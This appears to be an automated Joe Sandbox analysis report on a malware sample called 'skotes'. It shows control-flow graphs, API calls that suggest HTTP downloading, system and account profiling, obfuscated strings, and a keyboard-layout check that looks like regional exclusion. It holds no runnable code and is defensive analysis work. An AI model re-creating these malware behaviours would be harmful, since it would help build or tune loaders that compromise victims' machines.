ebf7b-ebfea call f7a00 call e5c10 call f7a00 call e5c10 1480->1485 1481->1480 1486 ebf5d-ebf6b 1484->1486 1487 ebf71-ebf78 call fd663 1484->1487 1498 ebfee-ec004 HttpSendRequestA 1485->1498 1499 ebfec 1485->1499 1486->1487 1487->1485 1500 ec006-ec015 1498->1500 1501 ec035-ec05d 1498->1501 1499->1498 1502 ec02b-ec032 call fd663 1500->1502 1503 ec017-ec025 1500->1503 1504 ec08e-ec0af InternetReadFile 1501->1504 1505 ec05f-ec06e 1501->1505 1502->1501 1503->1502 1509 ec0b5 1504->1509 1507 ec084-ec08b call fd663 1505->1507 1508 ec070-ec07e 1505->1508 1507->1504 1508->1507 1512 ec0c0-ec170 call 114250 1509->1512
                                                    APIs
                                                    • Sleep.KERNEL32(000005DC), ref: 000EBEB8
                                                    • InternetOpenW.WININET(00138DC8,00000000,00000000,00000000,00000000), ref: 000EBEC8
                                                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 000EBEEC
                                                    • HttpOpenRequestA.WININET(?,00000000), ref: 000EBF36
                                                    • HttpSendRequestA.WININET(?,00000000), ref: 000EBFF5
                                                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 000EC0A8
                                                    • InternetCloseHandle.WININET(?), ref: 000EC187
                                                    • InternetCloseHandle.WININET(?), ref: 000EC18F
                                                    • InternetCloseHandle.WININET(?), ref: 000EC197
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                    • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                    • API String ID: 2167506142-2254971868
                                                    • Opcode ID: 3adf853c7003fdca4ed8b1b0eb53d9f4d6555c0457dffbb558cfb856460cbfa9
                                                    • Instruction ID: 71f8980e3d91b0ac0fa83a88dc1d1b68f4a4bb5523d8f224c77cd667ca05fe98
                                                    • Opcode Fuzzy Hash: 3adf853c7003fdca4ed8b1b0eb53d9f4d6555c0457dffbb558cfb856460cbfa9
                                                    • Instruction Fuzzy Hash: 91B1E4B15001589FEB28CF29CC88BEEBBB5EF41304F5045A9F508A72D2D7719AC1CB95

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2066 e65e0-e6639 2140 e663a call 4ac0cde 2066->2140 2141 e663a call 4ac0c2f 2066->2141 2142 e663a call 4ac0bc9 2066->2142 2143 e663a call 4ac0c4a 2066->2143 2144 e663a call 4ac0bbb 2066->2144 2145 e663a call 4ac0cf7 2066->2145 2146 e663a call 4ac0ba7 2066->2146 2147 e663a call 4ac0ba0 2066->2147 2148 e663a call 4ac0ca1 2066->2148 2149 e663a call 4ac0c11 2066->2149 2150 e663a call 4ac0be1 2066->2150 2151 e663a call 4ac0cf2 2066->2151 2067 e663f-e66b8 LookupAccountNameA call f7a00 call e5c10 2073 e66bc-e66db call e22c0 2067->2073 2074 e66ba 2067->2074 2077 e670c-e6712 2073->2077 2078 e66dd-e66ec 2073->2078 2074->2073 2081 e6715-e671a 2077->2081 2079 e66ee-e66fc 2078->2079 2080 e6702-e6709 call fd663 2078->2080 2079->2080 2082 e6937 call 116c6a 2079->2082 2080->2077 2081->2081 2084 e671c-e6744 call f7a00 call e5c10 2081->2084 2089 e693c call 116c6a 2082->2089 2094 e6748-e6769 call e22c0 2084->2094 2095 e6746 2084->2095 2093 e6941-e6946 call 116c6a 2089->2093 2100 e679a-e67ae 2094->2100 2101 e676b-e677a 2094->2101 2095->2094 2107 e6858-e687c 2100->2107 2108 e67b4-e67ba 2100->2108 2102 e677c-e678a 2101->2102 2103 e6790-e6797 call fd663 2101->2103 2102->2089 2102->2103 2103->2100 2110 e6880-e6885 2107->2110 2109 e67c0-e67ed call f7a00 call e5c10 2108->2109 2123 e67ef 2109->2123 2124 e67f1-e6818 call e22c0 2109->2124 2110->2110 2111 e6887-e68ec call f80c0 * 2 2110->2111 2120 e68ee-e68fd 2111->2120 2121 e6919-e6936 call fcff1 2111->2121 2125 e690f-e6916 call fd663 2120->2125 2126 e68ff-e690d 2120->2126 2123->2124 2133 e681a-e6829 2124->2133 2134 e6849-e684c 2124->2134 2125->2121 2126->2093 2126->2125 2135 e683f-e6846 call fd663 2133->2135 2136 e682b-e6839 2133->2136 2134->2109 2137 e6852 2134->2137 2135->2134 2136->2082 2136->2135 2137->2107 2140->2067 2141->2067 2142->2067 2143->2067 2144->2067 2145->2067 2146->2067 2147->2067 2148->2067 2149->2067 2150->2067 2151->2067
                                                    APIs
                                                    • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 000E6680
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AccountLookupName
                                                    • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                                    • API String ID: 1484870144-2309319047
                                                    • Opcode ID: 91bd300e7dddf22dc7c1de36d17b84a11a9f5d7d0230df08cec65f83139cb5a5
                                                    • Instruction ID: a33943c578fbf2a337fb108a262af2f692cc8d75770b9ae7fc88831454fe400b
                                                    • Opcode Fuzzy Hash: 91bd300e7dddf22dc7c1de36d17b84a11a9f5d7d0230df08cec65f83139cb5a5
                                                    • Instruction Fuzzy Hash: 0991C1B19001589FDB28DB28DC85BEDB7B9EB45304F4045E9E619A7282DB319BC4CFA4
                                                    APIs
                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 000E24BE
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ___std_exception_copy
                                                    • String ID:
                                                    • API String ID: 2659868963-0
                                                    • Opcode ID: f0889ea3fc8a32f02054f9b9f5779ecd768988127f6e2776d210cdff2b66e352
                                                    • Instruction ID: 804fabb6882b40ae7b739133f05b255d789335db420c637141d1d5660b2e8be3
                                                    • Opcode Fuzzy Hash: f0889ea3fc8a32f02054f9b9f5779ecd768988127f6e2776d210cdff2b66e352
                                                    • Instruction Fuzzy Hash: 1151D17690060A8BDB15CF58D8857ADB7F2FB49314F24852AE605EBAA1D334AD80CB90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 f3640-f3679 1 f367f-f36cf call f80c0 0->1 2 f4250-f4256 0->2 14 f4327 call f8200 1->14 15 f36d5-f371b call f80c0 1->15 4 f4258-f4264 2->4 5 f4284-f429c 2->5 9 f427a-f4281 call fd663 4->9 10 f4266-f4274 4->10 6 f429e-f42aa 5->6 7 f42ca-f42e2 5->7 12 f42ac-f42ba 6->12 13 f42c0-f42c7 call fd663 6->13 16 f430c-f4326 call fcff1 7->16 17 f42e4-f42f0 7->17 9->5 10->9 18 f4363 call 116c6a 10->18 12->13 12->18 13->7 28 f432c call f8200 14->28 15->14 33 f3721-f375f call f80c0 15->33 24 f4302-f4309 call fd663 17->24 25 f42f2-f4300 17->25 24->16 25->18 25->24 35 f4331 call 116c6a 28->35 33->14 40 f3765-f37b0 call f80c0 call f7a00 call e5c10 33->40 39 f4336 call 116c6a 35->39 43 f433b call f8200 39->43 53 f37b4-f37e9 call f8ba0 40->53 54 f37b2 40->54 48 f4340 call 116c6a 43->48 52 f4345 call 116c6a 48->52 57 f434a-f434f call fc199 52->57 53->28 61 f37ef-f381e call f80c0 53->61 54->53 60 f4354 call 116c6a 57->60 64 f4359-f435e call fc1d9 60->64 67 f384f-f3874 call e98f0 61->67 68 f3820-f382f 61->68 64->18 74 f387a-f38e2 call f7a00 call e5c10 call f80c0 67->74 75 f3d58-f3d5e 67->75 70 f3845-f384c call fd663 68->70 71 f3831-f383f 68->71 70->67 71->35 71->70 110 f38e6-f391d call f9470 74->110 111 f38e4 74->111 77 f3d8c-f3d92 75->77 78 f3d60-f3d6c 75->78 83 f3d94-f3da0 77->83 84 f3dc0-f3dc6 77->84 80 f3d6e-f3d7c 78->80 81 f3d82-f3d89 call fd663 78->81 80->60 80->81 81->77 87 f3db6-f3dbd call fd663 83->87 88 f3da2-f3db0 83->88 89 f3dc8-f3dd4 84->89 90 f3df4-f3e0c 84->90 87->84 88->60 88->87 96 f3dea-f3df1 call fd663 89->96 97 f3dd6-f3de4 89->97 91 f3e0e-f3e1d 90->91 92 f3e3d-f3e43 90->92 99 f3e1f-f3e2d 91->99 100 f3e33-f3e3a call fd663 91->100 92->2 102 f3e49-f3e55 92->102 96->90 97->60 97->96 99->60 99->100 100->92 107 f3e5b-f3e69 102->107 108 f4246-f424d call fd663 102->108 107->60 113 f3e6f 107->113 108->2 117 f391f-f392a 110->117 118 f394a-f3957 110->118 111->110 113->108 121 f392c-f393a 117->121 122 f3940-f3947 call fd663 117->122 119 f3959-f3968 118->119 120 f3988-f398f 118->120 124 f397e-f3985 call fd663 119->124 125 f396a-f3978 119->125 126 f3995-f39b7 120->126 127 f3b53-f3b83 call 1175f6 call 118ab6 120->127 121->39 121->122 122->118 124->120 125->39 125->124 126->43 131 f39bd-f39ef call f80c0 call ead70 126->131 127->57 139 f3b89-f3b8c 127->139 142 f3a47-f3a50 131->142 143 f39f1-f39f7 131->143 139->64 141 f3b92-f3b95 139->141 141->75 146 f3b9b 141->146 147 f3a52-f3a61 142->147 148 f3a81-f3ac1 call f7a00 * 2 call e49a0 142->148 144 f39f9-f3a05 143->144 145 f3a25-f3a44 143->145 149 f3a1b-f3a22 call fd663 144->149 150 f3a07-f3a15 144->150 145->142 151 f3c8d-f3d4d call f80c0 call f7a00 call e5c10 call f7a00 * 5 call f1ec0 146->151 152 f3e74-f3f3d call f80c0 call f7a00 call e5c10 call f7a00 * 5 146->152 153 f3ba2-f3c67 call f80c0 call f7a00 call e5c10 call f7a00 * 5 146->153 154 f3f42-f3fa4 call f7a00 * 4 call f2f10 146->154 155 f3a77-f3a7e call fd663 147->155 156 f3a63-f3a71 147->156 188 f3b19-f3b22 148->188 189 f3ac3-f3ac9 148->189 149->145 150->48 150->149 240 f3d52 151->240 238 f3c6b-f3c7d call f7a00 call f08e0 152->238 153->238 154->75 155->148 156->48 156->155 188->127 198 f3b24-f3b33 188->198 194 f3acb-f3ad7 189->194 195 f3af7-f3b16 189->195 202 f3aed-f3af4 call fd663 194->202 203 f3ad9-f3ae7 194->203 195->188 206 f3b49-f3b50 call fd663 198->206 207 f3b35-f3b43 198->207 202->195 203->52 203->202 206->127 207->52 207->206 244 f3c82-f3c88 238->244 240->75 244->75
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 000F434F
                                                      • Part of subcall function 000F7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 000F7AEC
                                                      • Part of subcall function 000F7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 000F7AF8
                                                      • Part of subcall function 000F7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 000F7B01
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                    • String ID: 2I0$ 3I3eB==$ GE0$ jS=$"$246122658369$5120$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$Hykl$KCWUOl==$MGE+$MGI+$V2Te$VXA0$VXQ0$Vmc0$WGS0$WGpm$WX f$aWW0$anE0$invalid stoi argument$stoi argument out of range
                                                    • API String ID: 4234742559-385961153
                                                    • Opcode ID: e24014fafe57eefe5ad81fd7a4ef5eb79caa55709ff46de01cfedce96613dbd2
                                                    • Instruction ID: e8f9445d8562f5d9e3000fa9663e80b85755ecb7c165a2d24e1fcb11c2590d3f
                                                    • Opcode Fuzzy Hash: e24014fafe57eefe5ad81fd7a4ef5eb79caa55709ff46de01cfedce96613dbd2
                                                    • Instruction Fuzzy Hash: A3523570A0024C9BDF18EF78CC4A7EEBBB5AF45310F548588E505A7683DB359B849B92
                                                    APIs
                                                      • Part of subcall function 000F7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 000F7AEC
                                                      • Part of subcall function 000F7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 000F7AF8
                                                      • Part of subcall function 000F7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 000F7B01
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 000F434F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                    • String ID: "$246122658369$5120$8HJUeIfzLo==$8HJUeMD Lq5=$Fw==$Hykl$V2Te$WDw=$WGpm$WTs=$WTw=$WX f$invalid stoi argument$stoi argument out of range
                                                    • API String ID: 4234742559-3001895933
                                                    • Opcode ID: 9bb350cc1bb2a22170021ba07135e0f2c83d75edf64d03c42e779a1362f3e073
                                                    • Instruction ID: 79dd1497ab4134ffd330321f5dc66fc69a7cc7011f8d452fffcdc97b0672de98
                                                    • Opcode Fuzzy Hash: 9bb350cc1bb2a22170021ba07135e0f2c83d75edf64d03c42e779a1362f3e073
                                                    • Instruction Fuzzy Hash: DEB22470A0024C9BDF18EF78CC4ABEEBBB1AF45310F54855CE505A7682DB359B84DB92

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1826 e5ee0-e5fde 1832 e6008-e6015 call fcff1 1826->1832 1833 e5fe0-e5fec 1826->1833 1834 e5ffe-e6005 call fd663 1833->1834 1835 e5fee-e5ffc 1833->1835 1834->1832 1835->1834 1837 e6016-e619d call 116c6a call fe150 call f80c0 * 5 RegOpenKeyExA 1835->1837 1855 e61a3-e6233 call 1140f0 1837->1855 1856 e64b1-e64ba 1837->1856 1885 e649f-e64ab 1855->1885 1886 e6239-e623d 1855->1886 1858 e64bc-e64c7 1856->1858 1859 e64e7-e64f0 1856->1859 1863 e64dd-e64e4 call fd663 1858->1863 1864 e64c9-e64d7 1858->1864 1860 e651d-e6526 1859->1860 1861 e64f2-e64fd 1859->1861 1869 e6528-e6533 1860->1869 1870 e6553-e655c 1860->1870 1867 e64ff-e650d 1861->1867 1868 e6513-e651a call fd663 1861->1868 1863->1859 1864->1863 1865 e65d7-e65df call 116c6a 1864->1865 1867->1865 1867->1868 1868->1860 1876 e6549-e6550 call fd663 1869->1876 1877 e6535-e6543 1869->1877 1871 e655e-e6569 1870->1871 1872 e6585-e658e 1870->1872 1880 e657b-e6582 call fd663 1871->1880 1881 e656b-e6579 1871->1881 1882 e65bb-e65d6 call fcff1 1872->1882 1883 e6590-e659f 1872->1883 1876->1870 1877->1865 1877->1876 1880->1872 1881->1865 1881->1880 1889 e65b1-e65b8 call fd663 1883->1889 1890 e65a1-e65af 1883->1890 1885->1856 1892 e6499 1886->1892 1893 e6243-e6279 RegEnumValueA 1886->1893 1889->1882 1890->1865 1890->1889 1892->1885 1899 e627f-e629e 1893->1899 1900 e6486-e648d 1893->1900 1903 e62a0-e62a5 1899->1903 1900->1893 1901 e6493 1900->1901 1901->1892 1903->1903 1904 e62a7-e62fb call f80c0 call f7a00 * 2 call e5d50 1903->1904 1904->1900
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673318430.00000000003FA000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673430177.0000000000598000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2673461063.000000000059A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_e0000_skotes.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                    • API String ID: 0-3963862150
                                                    • Opcode ID: 8543de3fa1cb545a68e2713d26944cca09ba23f48e0cae7dde246dbf4e5918f1
                                                    • Instruction ID: 0d37389ac93ab0481e7bc6e596b2bf0f0f8faac2cba34f4db519ec70abb70580
                                                    • Opcode Fuzzy Hash: 8543de3fa1cb545a68e2713d26944cca09ba23f48e0cae7dde246dbf4e5918f1
                                                    • Instruction Fuzzy Hash: 93D1C0719002589FEB24DF54CC84BEEB7B9AF15340F5042D8F508E7292DB75AAD48F94

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1912 e7d30-e7db2 call 1140f0 1916 e7db8-e7de0 call f7a00 call e5c10 1912->1916 1917 e8356-e8373 call fcff1 1912->1917 1924 e7de4-e7e06 call f7a00 call e5c10 1916->1924 1925 e7de2 1916->1925 1930 e7e0a-e7e23 1924->1930 1931 e7e08 1924->1931 1925->1924 1934 e7e54-e7e7f 1930->1934 1935 e7e25-e7e34 1930->1935 1931->1930 1938 e7eb0-e7ed1 1934->1938 1939 e7e81-e7e90 1934->1939 1936 e7e4a-e7e51 call fd663 1935->1936 1937 e7e36-e7e44 1935->1937 1936->1934 1937->1936 1940 e8374 call 116c6a 1937->1940 1944 e7ed7-e7edc 1938->1944 1945 e7ed3-e7ed5 GetNativeSystemInfo 1938->1945 1942 e7ea6-e7ead call fd663 1939->1942 1943 e7e92-e7ea0 1939->1943 1953 e8379-e837f call 116c6a 1940->1953 1942->1938 1943->1940 1943->1942 1946 e7edd-e7ee6 1944->1946 1945->1946 1951 e7ee8-e7eef 1946->1951 1952 e7f04-e7f07 1946->1952 1955 e7ef5-e7eff 1951->1955 1956 e8351 1951->1956 1957 e7f0d-e7f16 1952->1957 1958 e82f7-e82fa 1952->1958 1960 e834c 1955->1960 1956->1917 1961 e7f18-e7f24 1957->1961 1962 e7f29-e7f2c 1957->1962 1958->1956 1963 e82fc-e8305 1958->1963 1960->1956 1961->1960 1965 e82d4-e82d6 1962->1965 1966 e7f32-e7f39 1962->1966 1967 e832c-e832f 1963->1967 1968 e8307-e830b 1963->1968 1969 e82d8-e82e2 1965->1969 1970 e82e4-e82e7 1965->1970 1971 e7f3f-e7f9b call f7a00 call e5c10 call f7a00 call e5c10 call e5d50 1966->1971 1972 e8019-e82bd call f7a00 call e5c10 call f7a00 call e5c10 call e5d50 call f7a00 call e5c10 call e5730 call f7a00 call e5c10 call f7a00 call e5c10 call e5d50 call f7a00 call e5c10 call e5730 call f7a00 call e5c10 call f7a00 call e5c10 call e5d50 call f7a00 call e5c10 call e5730 call f7a00 call e5c10 call f7a00 call e5c10 call e5d50 call f7a00 call e5c10 call e5730 1966->1972 1975 e833d-e8349 1967->1975 1976 e8331-e833b 1967->1976 1973 e830d-e8312 1968->1973 1974 e8320-e832a 1968->1974 1969->1960 1970->1956 1978 e82e9-e82f5 1970->1978 1997 e7fa0-e7fa7 1971->1997 2010 e82c3-e82cc 1972->2010 1973->1974 1980 e8314-e831e 1973->1980 1974->1956 1975->1960 1976->1956 1978->1960 1980->1956 1999 e7fab-e7fcb call 118bbe 1997->1999 2000 e7fa9 1997->2000 2006 e7fcd-e7fdc 1999->2006 2007 e8002-e8004 1999->2007 2000->1999 2012 e7fde-e7fec 2006->2012 2013 e7ff2-e7fff call fd663 2006->2013 2009 e800a-e8014 2007->2009 2007->2010 2009->2010 2010->1958 2015 e82ce 2010->2015 2012->1953 2012->2013 2013->2007 2015->1965
                                                    APIs
                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 000E7ED3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2672836765.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000E0000, based on PE: true
                                                    • Associated: 0000000C.00000002.2672798695.00000000000E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672836765.0000000000142000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672928970.0000000000149000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.000000000014B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003B8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2672964510.00000000003F9000.00000040.00000001.01000000.00000009.sdmpDownload File
